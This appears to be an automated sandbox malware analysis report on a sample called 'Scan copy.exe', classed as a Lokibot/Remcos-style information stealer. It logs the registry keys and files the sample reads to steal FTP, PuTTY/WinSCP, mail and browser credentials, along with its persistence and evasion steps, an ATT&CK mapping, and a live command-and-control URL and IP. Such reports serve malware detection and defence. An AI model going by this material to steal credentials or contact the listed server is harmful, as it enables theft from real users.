                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeQueries volume information: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Scan copy.exe PID: 5420, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vLQwEscoQr.exe PID: 7512, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vLQwEscoQr.exe PID: 8048, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 0000000A.00000002.2502216653.0000000000D76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Scan copy.exe PID: 7380, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.Scan copy.exe.51b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Scan copy.exe.51b0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1295403096.00000000051B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Scan copy.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: PopPassword20_2_0040D069
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: SmtpPassword20_2_0040D069
                Source: Yara matchFile source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.Scan copy.exe.51b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Scan copy.exe.51b0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1295403096.00000000051B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                111
                Process Injection
                1
                Masquerading
                2
                OS Credential Dumping
                111
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading
                1
                Scheduled Task/Job
                11
                Disable or Modify Tools
                2
                Credentials in Registry
                1
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                31
                Virtualization/Sandbox Evasion
                Security Account Manager31
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares2
                Data from Local System
                2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture112
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information
                Cached Domain Credentials13
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                Software Packing
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1564386 Sample: Scan copy.exe Startdate: 28/11/2024 Architecture: WINDOWS Score: 100 47 Multi AV Scanner detection for domain / URL 2->47 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 17 other signatures 2->53 7 Scan copy.exe 7 2->7         started        11 vLQwEscoQr.exe 5 2->11         started        process3 file4 37 C:\Users\user\AppData\...\vLQwEscoQr.exe, PE32 7->37 dropped 39 C:\Users\...\vLQwEscoQr.exe:Zone.Identifier, ASCII 7->39 dropped 41 C:\Users\user\AppData\Local\...\tmp18EC.tmp, XML 7->41 dropped 43 C:\Users\user\AppData\...\Scan copy.exe.log, ASCII 7->43 dropped 55 Adds a directory exclusion to Windows Defender 7->55 57 Injects a PE file into a foreign processes 7->57 13 Scan copy.exe 165 7->13         started        17 powershell.exe 23 7->17         started        19 powershell.exe 23 7->19         started        21 schtasks.exe 1 7->21         started        59 Antivirus detection for dropped file 11->59 61 Multi AV Scanner detection for dropped file 11->61 63 Tries to steal Mail credentials (via file registry) 11->63 65 Machine Learning detection for dropped file 11->65 23 schtasks.exe 11->23         started        25 vLQwEscoQr.exe 11->25         started        signatures5 process6 dnsIp7 45 94.156.177.41, 49703, 49705, 49707 NET1-ASBG Bulgaria 13->45 67 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->67 69 Tries to steal Mail credentials (via file / registry access) 13->69 71 Tries to harvest and steal ftp login credentials 13->71 73 Tries to harvest and steal browser information (history, passwords, etc) 13->73 75 Loading BitLocker PowerShell Module 17->75 27 conhost.exe 17->27         started        29 WmiPrvSE.exe 17->29         started        31 conhost.exe 19->31         started        33 conhost.exe 21->33         started        35 conhost.exe 23->35         started        signatures8 process9

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Scan copy.exe32%VirustotalBrowse
                Scan copy.exe24%ReversingLabsByteCode-MSIL.Trojan.Remcos
                Scan copy.exe100%AviraHEUR/AGEN.1307356
                Scan copy.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\vLQwEscoQr.exe100%AviraHEUR/AGEN.1307356
                C:\Users\user\AppData\Roaming\vLQwEscoQr.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\vLQwEscoQr.exe24%ReversingLabsByteCode-MSIL.Trojan.Remcos
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                94.156.177.41/simple/five/fre.php100%Avira URL Cloudmalware
                https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac0%Avira URL Cloudsafe
                http://94.156.177.41/simple/five/fre.php100%Avira URL Cloudmalware
                http://94.156.177.41/simple/five/fre.php18%VirustotalBrowse
                https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac0%VirustotalBrowse
                94.156.177.41/simple/five/fre.php18%VirustotalBrowse
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                94.156.177.41/simple/five/fre.phptrue
                • 18%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                http://kbfvzoboss.bid/alien/fre.phpfalse
                  high
                  http://alphastand.win/alien/fre.phpfalse
                    high
                    http://alphastand.trade/alien/fre.phpfalse
                      high
                      http://alphastand.top/alien/fre.phpfalse
                        high
                        http://94.156.177.41/simple/five/fre.phptrue
                        • 18%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cacScan copy.exe, vLQwEscoQr.exe.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScan copy.exe, 00000000.00000002.1291320333.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, vLQwEscoQr.exe, 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.ibsensoftware.com/vLQwEscoQr.exe, vLQwEscoQr.exe, 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            94.156.177.41
                            unknownBulgaria
                            43561NET1-ASBGtrue
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1564386
                            Start date and time:2024-11-28 09:13:16 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 9s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:25
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Scan copy.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@19/17@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 77
                            • Number of non-executed functions: 17
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            03:14:10API Interceptor66x Sleep call for process: Scan copy.exe modified
                            03:14:12API Interceptor37x Sleep call for process: powershell.exe modified
                            03:14:15API Interceptor2x Sleep call for process: vLQwEscoQr.exe modified
                            09:14:13Task SchedulerRun new task: vLQwEscoQr path: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            94.156.177.41file.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/maxzi/five/fre.php
                            Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                            • 94.156.177.41/simple/five/fre.php
                            stthigns.docGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/maxzi/five/fre.php
                            goodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                            • 94.156.177.41/maxzi/five/fre.php
                            PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/maxzi/five/fre.php
                            ECxDwGGFH3.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/simple/five/fre.php
                            greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                            • 94.156.177.41/simple/five/fre.php
                            Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                            • 94.156.177.41/simple/five/fre.php
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            NET1-ASBGla.bot.sparc.elfGet hashmaliciousUnknownBrowse
                            • 93.123.76.46
                            efN78UF3Si.exeGet hashmaliciousDarkTortilla, SmokeLoaderBrowse
                            • 94.156.177.166
                            file.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41
                            filepdf.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                            • 94.156.177.166
                            putty .exeGet hashmaliciousDarkTortilla, SmokeLoaderBrowse
                            • 94.156.177.166
                            2.ps1Get hashmaliciousUnknownBrowse
                            • 94.156.177.166
                            Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                            • 94.156.177.41
                            stthigns.docGet hashmaliciousLokibotBrowse
                            • 94.156.177.41
                            goodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                            • 94.156.177.41
                            PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                            • 94.156.177.41
                            No context
                            No context
                            Process:C:\Users\user\Desktop\Scan copy.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1216
                            Entropy (8bit):5.34331486778365
                            Encrypted:false
                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
